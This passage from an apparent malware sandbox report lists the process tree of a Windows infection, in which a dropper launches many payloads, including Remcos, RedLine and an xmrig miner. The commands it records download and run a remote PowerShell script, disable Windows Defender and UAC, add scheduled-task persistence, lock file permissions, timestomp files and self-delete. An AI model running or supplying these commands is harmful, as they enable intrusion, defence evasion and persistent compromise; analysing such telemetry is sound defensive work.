- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:2024
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:4536
- C:\Users\Admin\AppData\Local\Temp\a\ceshi.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ceshi.exe"
  2⤵
  PID:1364
- C:\Users\Admin\AppData\Local\Temp\a\Installer.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Installer.exe"
  2⤵
  PID:1096
- - C:\Windows\system32\notepad.exe
    "C:\Windows\system32\notepad.exe"
    3⤵
    PID:4796
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --no-first-run --no-default-browser-check --noerrdialogs --disable-backgrounding-occluded-windows --disable-background-timer-throttling --disable-background-networking --disable-extensions-http-throttling --disable-renderer-backgrounding --disable-audio-output --disable-breakpad --disable-sync --silent-launch --restore-last-session --ran-launcher --profile-directory="Default"
      4⤵
      PID:408
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd0,0xd4,0xd8,0xcc,0xdc,0x7ffdfb0e9758,0x7ffdfb0e9768,0x7ffdfb0e9778
        5⤵
        
        PID:5416
- C:\Windows\SysWOW64\NETSTAT.EXE
  "C:\Windows\SysWOW64\NETSTAT.EXE"
  2⤵
  - Gathers network information
  PID:1868
- - C:\Program Files\Mozilla Firefox\Firefox.exe
    "C:\Program Files\Mozilla Firefox\Firefox.exe"
    3⤵
    PID:6124
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 6124 -s 104
      4⤵
      Program crash
      PID:5732
- C:\Windows\SysWOW64\autofmt.exe
  "C:\Windows\SysWOW64\autofmt.exe"
  2⤵
  PID:3452
- C:\Windows\SysWOW64\explorer.exe
  "C:\Windows\SysWOW64\explorer.exe"
  2⤵
  PID:4524
- - C:\Program Files\Mozilla Firefox\Firefox.exe
    "C:\Program Files\Mozilla Firefox\Firefox.exe"
    3⤵
    PID:5336
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 5336 -s 452
      4⤵
      Program crash
      PID:5880
- C:\Users\Admin\AppData\Local\Temp\a\G.exe
  "C:\Users\Admin\AppData\Local\Temp\a\G.exe"
  2⤵
  PID:1616
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\YYY.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\YYY.exe"
    3⤵
    PID:5616
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
      4⤵
      PID:5828
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 1 & Del "C:\Users\Admin\AppData\Local\Temp\a\G.exe"
    3⤵
    PID:5692
  - - C:\Windows\SysWOW64\choice.exe
      choice /C Y /N /D Y /T 1
      4⤵
      PID:5912
- C:\Users\Admin\AppData\Local\Temp\a\1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\1.exe"
  2⤵
  PID:3324
- C:\Users\Admin\AppData\Local\Temp\a\w-9.exe
  "C:\Users\Admin\AppData\Local\Temp\a\w-9.exe"
  2⤵
  PID:4872
- C:\Users\Admin\AppData\Local\Temp\a\secmorganzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\secmorganzx.exe"
  2⤵
  PID:2636
- C:\Users\Admin\AppData\Local\Temp\a\Dollar.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Dollar.exe"
  2⤵
  PID:396
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:68
- C:\Users\Admin\AppData\Local\Temp\a\H2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\H2.exe"
  2⤵
  PID:4424
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:5788
  - - C:\Users\Admin\AppData\Local\Temp\Remcos\remcos.exe
      "C:\Users\Admin\AppData\Local\Temp\Remcos\remcos.exe"
      4⤵
      PID:1028
- C:\Users\Admin\AppData\Local\Temp\a\2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\2.exe"
  2⤵
  PID:5228
- C:\Users\Admin\AppData\Local\Temp\a\DIV.exe
  "C:\Users\Admin\AppData\Local\Temp\a\DIV.exe"
  2⤵
  PID:5524
- C:\Users\Admin\AppData\Local\Temp\a\teambzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\teambzx.exe"
  2⤵
  PID:5756
- - C:\Users\Admin\AppData\Local\Temp\a\teambzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\teambzx.exe"
    3⤵
    PID:5772
- - C:\Users\Admin\AppData\Local\Temp\a\teambzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\teambzx.exe"
    3⤵
    PID:3840
- C:\Users\Admin\AppData\Local\Temp\a\WindowsApp1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\WindowsApp1.exe"
  2⤵
  PID:5872
- C:\Users\Admin\AppData\Local\Temp\a\M.exe
  "C:\Users\Admin\AppData\Local\Temp\a\M.exe"
  2⤵
  PID:6024
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:5248
- C:\Users\Admin\AppData\Local\Temp\a\agodzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\agodzx.exe"
  2⤵
  PID:3352
- - C:\Users\Admin\AppData\Local\Temp\a\agodzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\agodzx.exe"
    3⤵
    PID:5352
- - C:\Users\Admin\AppData\Local\Temp\a\agodzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\agodzx.exe"
    3⤵
    PID:5820
- C:\Users\Admin\AppData\Local\Temp\a\smss.exe
  "C:\Users\Admin\AppData\Local\Temp\a\smss.exe"
  2⤵
  PID:2780
- - C:\Users\Admin\AppData\Local\Temp\a\smss.exe
    "C:\Users\Admin\AppData\Local\Temp\a\smss.exe"
    3⤵
    PID:6032
- C:\Users\Admin\AppData\Local\Temp\a\R.exe
  "C:\Users\Admin\AppData\Local\Temp\a\R.exe"
  2⤵
  PID:4868
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:4580
- C:\Users\Admin\AppData\Local\Temp\a\ar.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ar.exe"
  2⤵
  PID:1824
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:5340
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:5984
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:5056
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:5060
- C:\Users\Admin\AppData\Local\Temp\a\ARR.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ARR.exe"
  2⤵
  PID:5780
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:3296
- C:\Users\Admin\AppData\Local\Temp\a\D.exe
  "C:\Users\Admin\AppData\Local\Temp\a\D.exe"
  2⤵
  PID:6104
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:5904
- C:\Users\Admin\AppData\Local\Temp\a\NEV.exe
  "C:\Users\Admin\AppData\Local\Temp\a\NEV.exe"
  2⤵
  PID:4604
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:5536
- C:\Users\Admin\AppData\Local\Temp\a\ogumbgejapxd.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ogumbgejapxd.exe"
  2⤵
  PID:4864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\a\ogumbgejapxd.exe
    3⤵
    PID:5372
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 0
      4⤵
      PID:1700
- C:\Users\Admin\AppData\Local\Temp\a\ventascry.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ventascry.exe"
  2⤵
  PID:5580
- - C:\Users\Admin\AppData\Local\Temp\a\ventascry.exe
    "C:\Users\Admin\AppData\Local\Temp\a\ventascry.exe"
    3⤵
    PID:5784
- C:\Users\Admin\AppData\Local\Temp\a\wasx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\wasx.exe"
  2⤵
  PID:5372
- - C:\Users\Admin\AppData\Local\Temp\a\wasx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\wasx.exe"
    3⤵
    PID:6088
- C:\Users\Admin\AppData\Local\Temp\a\dd.exe
  "C:\Users\Admin\AppData\Local\Temp\a\dd.exe"
  2⤵
  PID:5840
- - C:\Users\Admin\AppData\Local\Temp\a\dd.exe
    "C:\Users\Admin\AppData\Local\Temp\a\dd.exe"
    3⤵
    PID:5900
- C:\Users\Admin\AppData\Local\Temp\a\postmon.exe
  "C:\Users\Admin\AppData\Local\Temp\a\postmon.exe"
  2⤵
  PID:2548
- - C:\Windows\System32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://transparenciacanaa.com.br/cidadejunina/js/vendor/debug2.ps1')"
    3⤵
    PID:3252
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command IEX(New-Object Net.Webclient).DownloadString('https://transparenciacanaa.com.br/cidadejunina/js/vendor/debug2.ps1')
      4⤵
      PID:1532
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\a\postmon.exe" >> NUL
    3⤵
    PID:6224
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1
      4⤵
      Runs ping.exe
      PID:7752
- C:\Users\Admin\AppData\Local\Temp\a\red.exe
  "C:\Users\Admin\AppData\Local\Temp\a\red.exe"
  2⤵
  PID:5224
- C:\Users\Admin\AppData\Local\Temp\a\Facebook.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Facebook.exe"
  2⤵
  PID:4500
- C:\Users\Admin\AppData\Local\Temp\a\fristname.exe
  "C:\Users\Admin\AppData\Local\Temp\a\fristname.exe"
  2⤵
  PID:6080
- - C:\Users\Admin\AppData\Local\Temp\ae3108e6c23af96b9aac776041f0203a.exe
    "C:\Users\Admin\AppData\Local\Temp\ae3108e6c23af96b9aac776041f0203a.exe"
    3⤵
    PID:5400
- - C:\Users\Admin\AppData\Local\Temp\BitDefendMS.exe
    "C:\Users\Admin\AppData\Local\Temp\BitDefendMS.exe"
    3⤵
    PID:4268
- - C:\Users\Admin\AppData\Local\Temp\Builtt.exe
    "C:\Users\Admin\AppData\Local\Temp\Builtt.exe"
    3⤵
    PID:60
  - - C:\Users\Admin\AppData\Local\Temp\Builtt.exe
      "C:\Users\Admin\AppData\Local\Temp\Builtt.exe"
      4⤵
      PID:4848
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "net session"
        5⤵
        
        PID:6496
      - C:\Windows\system32\net.exe
        
        net session
        6⤵
        
        PID:5688
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        7⤵
        
        PID:4372
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
        7⤵
        
        PID:7580
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:7100
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:7096
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        5⤵
        
        PID:3204
      - C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        bound.exe
        6⤵
        
        PID:8068
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        5⤵
        
        PID:5688
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
        5⤵
        
        PID:6116
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Builtt.exe'"
        5⤵
        
        PID:3456
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Builtt.exe'
        6⤵
        
        PID:6976
- C:\Users\Admin\AppData\Local\Temp\a\IE_CACHE.exe
  "C:\Users\Admin\AppData\Local\Temp\a\IE_CACHE.exe"
  2⤵
  PID:4148
- C:\Users\Admin\AppData\Local\Temp\a\wall.exe
  "C:\Users\Admin\AppData\Local\Temp\a\wall.exe"
  2⤵
  PID:5000
- - C:\Users\Admin\AppData\Local\Temp\aafg31.exe
    "C:\Users\Admin\AppData\Local\Temp\aafg31.exe"
    3⤵
    PID:692
- - C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
    "C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"
    3⤵
    PID:5920
  - - C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
      "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
      4⤵
      PID:5880
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:5148
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit
        5⤵
        
        PID:4720
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        6⤵
        
        PID:396
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "oneetx.exe" /P "Admin:N"
        6⤵
        
        PID:6284
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "oneetx.exe" /P "Admin:R" /E
        6⤵
        
        PID:2412
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        6⤵
        
        PID:6668
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\207aa4515d" /P "Admin:N"
        6⤵
        
        PID:5316
    - - C:\Users\Admin\AppData\Local\Temp\1000004001\toolspub2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000004001\toolspub2.exe"
        5⤵
        
        PID:7052
      - C:\Users\Admin\AppData\Local\Temp\1000004001\toolspub2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000004001\toolspub2.exe"
        6⤵
        
        PID:7072
- - C:\Users\Admin\AppData\Local\Temp\XandETC.exe
    "C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
    3⤵
    PID:4724
- C:\Users\Admin\AppData\Local\Temp\a\WWW3_64.exe
  "C:\Users\Admin\AppData\Local\Temp\a\WWW3_64.exe"
  2⤵
  PID:5684
- C:\Users\Admin\AppData\Local\Temp\a\gogw.exe
  "C:\Users\Admin\AppData\Local\Temp\a\gogw.exe"
  2⤵
  PID:5668
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN MicrosoftEdgeUpdateTaskMachineUARun.exe /TR C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe"
    3⤵
    PID:5908
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN MicrosoftEdgeUpdateTaskMachineUARun.exe /TR C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe
      4⤵
      Creates scheduled task(s)
      PID:7072
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell "" "Set-ItemProperty -Path \"C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe\" -Name CreationTime -Value \"06/13/2022 3:16 PM\""
    3⤵
    PID:6624
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell "" "Set-ItemProperty -Path \"C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe\" -Name LastWriteTime -Value \"06/13/2022 3:16 PM\""
    3⤵
    PID:4420
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell "" "Set-ItemProperty -Path \"C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe\" -Name LastAccessTime -Value \"06/13/2022 3:16 PM\""
    3⤵
    PID:4708
- C:\Users\Admin\AppData\Local\Temp\a\trust.exe
  "C:\Users\Admin\AppData\Local\Temp\a\trust.exe"
  2⤵
  PID:5856
- C:\Users\Admin\AppData\Local\Temp\a\crypted.exe
  "C:\Users\Admin\AppData\Local\Temp\a\crypted.exe"
  2⤵
  PID:5332
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    PID:6596
- C:\Users\Admin\AppData\Local\Temp\a\tg.exe
  "C:\Users\Admin\AppData\Local\Temp\a\tg.exe"
  2⤵
  PID:4984
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    3⤵
    PID:6892
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4984 -s 272
    3⤵
    - Program crash
    PID:6816
- C:\Users\Admin\AppData\Local\Temp\a\putty.exe
  "C:\Users\Admin\AppData\Local\Temp\a\putty.exe"
  2⤵
  PID:4512
- C:\Users\Admin\AppData\Local\Temp\a\v.exe
  "C:\Users\Admin\AppData\Local\Temp\a\v.exe"
  2⤵
  PID:4924
- - C:\Program Files (x86)\Google\Temp\GUM408B.tmp\GoogleUpdate.exe
    "C:\Program Files (x86)\Google\Temp\GUM408B.tmp\GoogleUpdate.exe" /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={4611E087-CB70-244B-9202-F605357A02F4}&lang=en&browser=5&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&brand=CHBF&installdataindex=empty"
    3⤵
    PID:7112
  - - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
      "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc
      4⤵
      PID:6064
  - - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
      "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver
      4⤵
      PID:5988
    - - C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe"
        5⤵
        
        PID:6248
    - - C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe"
        5⤵
        
        PID:6868
    - - C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe"
        5⤵
        
        PID:7424
  - - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
      "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4xMjIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4xMjEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7RDgzRDhERDYtMDU2My00QjIwLTkxRTUtNDc2OTNCQjM1NUFFfSIgdXNlcmlkPSJ7NUVDQkRBMTYtOTU2Ny00NDBFLUJBMzUtODVENjdGNDU4Nzc3fSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0iezQ0RDEwQzk0LUYyNkItNDA0RC1BRkZBLTE1MEU4ODVFRjYyRH0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xNTA2My4wIiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7NDMwRkQ0RDAtQjcyOS00RjYxLUFBMzQtOTE1MjY0ODE3OTlEfSIgdmVyc2lvbj0iMS4zLjM2LjE1MSIgbmV4dHZlcnNpb249IjEuMy4zNi4xMjIiIGxhbmc9ImVuIiBicmFuZD0iQ0hCRiIgY2xpZW50PSIiIGlpZD0iezQ2MTFFMDg3LUNCNzAtMjQ0Qi05MjAyLUY2MDUzNTdBMDJGNH0iPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIGluc3RhbGxfdGltZV9tcz0iMzg4NTAiLz48L2FwcD48L3JlcXVlc3Q-
      4⤵
      PID:3368
  - - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
      "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /handoff "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={4611E087-CB70-244B-9202-F605357A02F4}&lang=en&browser=5&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&brand=CHBF&installdataindex=empty" /installsource taggedmi /sessionid "{D83D8DD6-0563-4B20-91E5-47693BB355AE}"
      4⤵
      PID:5644
- C:\Users\Admin\AppData\Local\Temp\a\INTERNET.exe
  "C:\Users\Admin\AppData\Local\Temp\a\INTERNET.exe"
  2⤵
  PID:6456
- C:\Users\Admin\AppData\Local\Temp\a\mslink1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\mslink1.exe"
  2⤵
  PID:7132
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 916
    3⤵
    - Program crash
    PID:4844
- C:\Users\Admin\AppData\Local\Temp\a\oceanzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\oceanzx.exe"
  2⤵
  PID:6428
- - C:\Users\Admin\AppData\Local\Temp\a\oceanzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\oceanzx.exe"
    3⤵
    PID:4716
- - C:\Users\Admin\AppData\Local\Temp\a\oceanzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\oceanzx.exe"
    3⤵
    PID:7840
- C:\Users\Admin\AppData\Local\Temp\a\cc.exe
  "C:\Users\Admin\AppData\Local\Temp\a\cc.exe"
  2⤵
  PID:6944
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6944 -s 672
    3⤵
    - Program crash
    PID:3108
- C:\Users\Admin\AppData\Local\Temp\a\p0aw25.exe
  "C:\Users\Admin\AppData\Local\Temp\a\p0aw25.exe"
  2⤵
  PID:6920
- C:\Users\Admin\AppData\Local\Temp\a\clp6.exe
  "C:\Users\Admin\AppData\Local\Temp\a\clp6.exe"
  2⤵
  PID:5496
- - C:\ProgramData\h5gb4fg\g3f31sd.exe
    C:\ProgramData\h5gb4fg\g3f31sd.exe
    3⤵
    PID:676
- C:\Users\Admin\AppData\Local\Temp\a\redline.exe
  "C:\Users\Admin\AppData\Local\Temp\a\redline.exe"
  2⤵
  PID:212
- C:\Users\Admin\AppData\Local\Temp\a\dd4add6r.s6xlt.exe
  "C:\Users\Admin\AppData\Local\Temp\a\dd4add6r.s6xlt.exe"
  2⤵
  PID:6300
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
    3⤵
    PID:7268
- C:\Users\Admin\AppData\Local\Temp\a\BaldiTrojan-x64.exe
  "C:\Users\Admin\AppData\Local\Temp\a\BaldiTrojan-x64.exe"
  2⤵
  PID:7380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CleanZUpdater.bat
    3⤵
    PID:6132
  - - C:\Baldi\Baldi.exe
      C:\Baldi\Baldi.exe
      4⤵
      PID:5192
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im explorer.exe
        5⤵
        Kills process with taskkill
        
        PID:7004
  - - C:\Baldi\DisableUAC.exe
      C:\Baldi\DisableUAC.exe
      4⤵
      PID:5604
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7DD.tmp\7DE.bat C:\Baldi\DisableUAC.exe"
        5⤵
        
        PID:5512
      - C:\Windows\system32\reg.exe
        
        reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        6⤵
        
        PID:4624
      - C:\Windows\system32\shutdown.exe
        
        shutdown -r -t 1 -c "BALDI EVIL..."
        6⤵
        
        PID:7940
- C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe
  "C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe"
  2⤵
  PID:7948
- C:\Users\Admin\AppData\Local\Temp\a\Rebcoana.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Rebcoana.exe"
  2⤵
  PID:5368
- C:\Users\Admin\AppData\Local\Temp\a\a02.exe
  "C:\Users\Admin\AppData\Local\Temp\a\a02.exe"
  2⤵
  PID:7616
- - C:\Users\Admin\AppData\Local\Temp\2.1.1.exe
    C:\Users\Admin\AppData\Local\Temp\2.1.1.exe
    3⤵
    PID:1616
- - C:\Users\Admin\AppData\Local\Temp\wfplwfs.exe
    C:\Users\Admin\AppData\Local\Temp\wfplwfs.exe
    3⤵
    PID:3900
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5048
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\a\a02.exe"
    3⤵
    PID:7004
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 3
      4⤵
      Runs ping.exe
      PID:5028
- C:\Users\Admin\AppData\Local\Temp\a\ss49.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ss49.exe"
  2⤵
  PID:7216
